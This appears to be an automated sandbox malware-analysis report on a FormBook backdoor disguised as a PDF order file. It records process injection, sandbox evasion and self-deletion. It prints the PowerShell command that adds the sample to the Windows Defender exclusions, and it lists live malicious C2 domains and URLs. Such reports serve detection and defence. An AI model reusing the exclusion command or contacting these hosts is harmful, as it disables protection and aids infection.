          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117CA6F mov eax, dword ptr fs:[00000030h]4_2_0117CA6F
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EEA60 mov eax, dword ptr fs:[00000030h]4_2_011EEA60
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01178A90 mov edx, dword ptr fs:[00000030h]4_2_01178A90
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114EA80 mov eax, dword ptr fs:[00000030h]4_2_0114EA80
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114EA80 mov eax, dword ptr fs:[00000030h]4_2_0114EA80
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114EA80 mov eax, dword ptr fs:[00000030h]4_2_0114EA80
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114EA80 mov eax, dword ptr fs:[00000030h]4_2_0114EA80
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114EA80 mov eax, dword ptr fs:[00000030h]4_2_0114EA80
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114EA80 mov eax, dword ptr fs:[00000030h]4_2_0114EA80
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114EA80 mov eax, dword ptr fs:[00000030h]4_2_0114EA80
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114EA80 mov eax, dword ptr fs:[00000030h]4_2_0114EA80
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114EA80 mov eax, dword ptr fs:[00000030h]4_2_0114EA80
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01214A80 mov eax, dword ptr fs:[00000030h]4_2_01214A80
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01148AA0 mov eax, dword ptr fs:[00000030h]4_2_01148AA0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01148AA0 mov eax, dword ptr fs:[00000030h]4_2_01148AA0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01196AA4 mov eax, dword ptr fs:[00000030h]4_2_01196AA4
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01140AD0 mov eax, dword ptr fs:[00000030h]4_2_01140AD0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01174AD0 mov eax, dword ptr fs:[00000030h]4_2_01174AD0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01174AD0 mov eax, dword ptr fs:[00000030h]4_2_01174AD0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01196ACC mov eax, dword ptr fs:[00000030h]4_2_01196ACC
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01196ACC mov eax, dword ptr fs:[00000030h]4_2_01196ACC
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01196ACC mov eax, dword ptr fs:[00000030h]4_2_01196ACC
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117AAEE mov eax, dword ptr fs:[00000030h]4_2_0117AAEE
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117AAEE mov eax, dword ptr fs:[00000030h]4_2_0117AAEE
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01136D10 mov eax, dword ptr fs:[00000030h]4_2_01136D10
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01136D10 mov eax, dword ptr fs:[00000030h]4_2_01136D10
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01136D10 mov eax, dword ptr fs:[00000030h]4_2_01136D10
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01174D1D mov eax, dword ptr fs:[00000030h]4_2_01174D1D
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F8D10 mov eax, dword ptr fs:[00000030h]4_2_011F8D10
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F8D10 mov eax, dword ptr fs:[00000030h]4_2_011F8D10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00A048B7 GetLastError,SetLastError,GetProcessHeap,HeapFree,8_2_00A048B7
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00A061C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00A061C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00A06510 SetUnhandledExceptionFilter,8_2_00A06510
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"Jump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeNtQueueApcThread: Indirect: 0x10BA4F2Jump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeNtClose: Indirect: 0x10BA56C
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeMemory written: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeThread register set: target process: 1028Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 1028Jump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: A00000Jump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"Jump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess created: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"Jump to behavior
          Source: explorer.exe, 00000006.00000002.4546921012.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876221001.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.0000000009BA1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
          Source: explorer.exe, 00000006.00000000.2105059871.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4541175714.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.2105059871.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4543100345.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4541175714.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2105059871.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4541175714.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.2105059871.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4541175714.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000002.4540391524.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2104403018.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeQueries volume information: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00A06735 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,8_2_00A06735
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Command and Scripting Interpreter
          1
          DLL Side-Loading
          512
          Process Injection
          11
          Masquerading
          OS Credential Dumping1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Shared Modules
          Boot or Logon Initialization Scripts1
          Abuse Elevation Control Mechanism
          11
          Disable or Modify Tools
          LSASS Memory241
          Security Software Discovery
          Remote Desktop ProtocolData from Removable Media4
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading
          41
          Virtualization/Sandbox Evasion
          Security Account Manager2
          Process Discovery
          SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook512
          Process Injection
          NTDS41
          Virtualization/Sandbox Evasion
          Distributed Component Object ModelInput Capture13
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets1
          Application Window Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Abuse Elevation Control Mechanism
          Cached Domain Credentials1
          File and Directory Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items14
          Obfuscated Files or Information
          DCSync213
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Rundll32
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
          Software Packing
          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
          Timestomp
          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
          DLL Side-Loading
          Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1515805 Sample: ORDER_1105-19-24-3537.pdf.exe Startdate: 23/09/2024 Architecture: WINDOWS Score: 100 36 www.yzh478c.xyz 2->36 38 www.bdkasinoxox.xyz 2->38 40 14 other IPs or domains 2->40 48 Multi AV Scanner detection for domain / URL 2->48 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 56 14 other signatures 2->56 11 ORDER_1105-19-24-3537.pdf.exe 4 2->11         started        signatures3 54 Performs DNS queries to domains with low reputation 38->54 process4 file5 34 C:\...\ORDER_1105-19-24-3537.pdf.exe.log, ASCII 11->34 dropped 64 Adds a directory exclusion to Windows Defender 11->64 66 Tries to detect virtualization through RDTSC time measurements 11->66 68 Injects a PE file into a foreign processes 11->68 70 Switches to a custom stack to bypass stack traces 11->70 15 ORDER_1105-19-24-3537.pdf.exe 11->15         started        18 powershell.exe 23 11->18         started        signatures6 process7 signatures8 72 Modifies the context of a thread in another process (thread injection) 15->72 74 Maps a DLL or memory area into another process 15->74 76 Sample uses process hollowing technique 15->76 80 2 other signatures 15->80 20 explorer.exe 81 1 15->20 injected 78 Loading BitLocker PowerShell Module 18->78 23 WmiPrvSE.exe 18->23         started        25 conhost.exe 18->25         started        process9 dnsIp10 42 www.abandoned-houses-39863.bond 185.53.179.90, 49716, 80 TEAMINTERNET-ASDE Germany 20->42 44 www.qwechaotk.top 154.21.81.142, 49720, 80 COGENT-174US United States 20->44 46 2 other IPs or domains 20->46 27 rundll32.exe 20->27         started        process11 signatures12 58 Modifies the context of a thread in another process (thread injection) 27->58 60 Maps a DLL or memory area into another process 27->60 62 Tries to detect virtualization through RDTSC time measurements 27->62 30 cmd.exe 1 27->30         started        process13 process14 32 conhost.exe 30->32         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          ORDER_1105-19-24-3537.pdf.exe69%ReversingLabsWin32.Backdoor.FormBook
          ORDER_1105-19-24-3537.pdf.exe71%VirustotalBrowse
          ORDER_1105-19-24-3537.pdf.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          www.beauty.university0%VirustotalBrowse
          nicoleb.tech11%VirustotalBrowse
          www.hinet.tech0%VirustotalBrowse
          www.abandoned-houses-39863.bond0%VirustotalBrowse
          practicalfranchises.info11%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://www.run-run.tokyo0%Avira URL Cloudsafe
          http://www.qwechaotk.top/rn94/www.ln2m1.shop100%Avira URL Cloudphishing
          http://www.practicalfranchises.infoReferer:0%Avira URL Cloudsafe
          http://www.practicalfranchises.info/rn94/100%Avira URL Cloudmalware
          http://www.day2go.net/rn94/?jDHh=Ls1ijzPDaFH4ewLYvuUNL8D06n2bzs/1tKV87wXNHEYKjENRXhu0pLj1Kv8q6blj9L7T&9r9Hc=ytxTjD5hRxA0%Avira URL Cloudsafe
          http://www.resdai.xyzReferer:0%Avira URL Cloudsafe
          http://www.bigbrown999.site/rn94/www.bdkasinoxox.xyz100%Avira URL Cloudmalware
          https://word.office.comon0%Avira URL Cloudsafe
          http://www.hinet.techReferer:0%Avira URL Cloudsafe
          http://www.resdai.xyz0%Avira URL Cloudsafe
          https://powerpoint.office.comcember0%Avira URL Cloudsafe
          http://www.yzh478c.xyz/rn94/100%Avira URL Cloudmalware
          http://www.abandoned-houses-39863.bondReferer:0%Avira URL Cloudsafe
          https://excel.office.com0%Avira URL Cloudsafe
          http://www.bigbrown999.site/rn94/100%Avira URL Cloudmalware
          http://www.beauty.university0%Avira URL Cloudsafe
          http://www.longmaosol.xyz100%Avira URL Cloudmalware
          http://schemas.micro0%Avira URL Cloudsafe
          http://www.abandoned-houses-39863.bond/rn94/0%Avira URL Cloudsafe
          http://www.bdkasinoxox.xyzReferer:0%Avira URL Cloudsafe
          http://www.laske.xyz/rn94/www.run-run.tokyo100%Avira URL Cloudmalware
          http://www.laske.xyzReferer:0%Avira URL Cloudsafe
          http://www.practicalfranchises.info/rn94/www.yzh478c.xyz100%Avira URL Cloudmalware
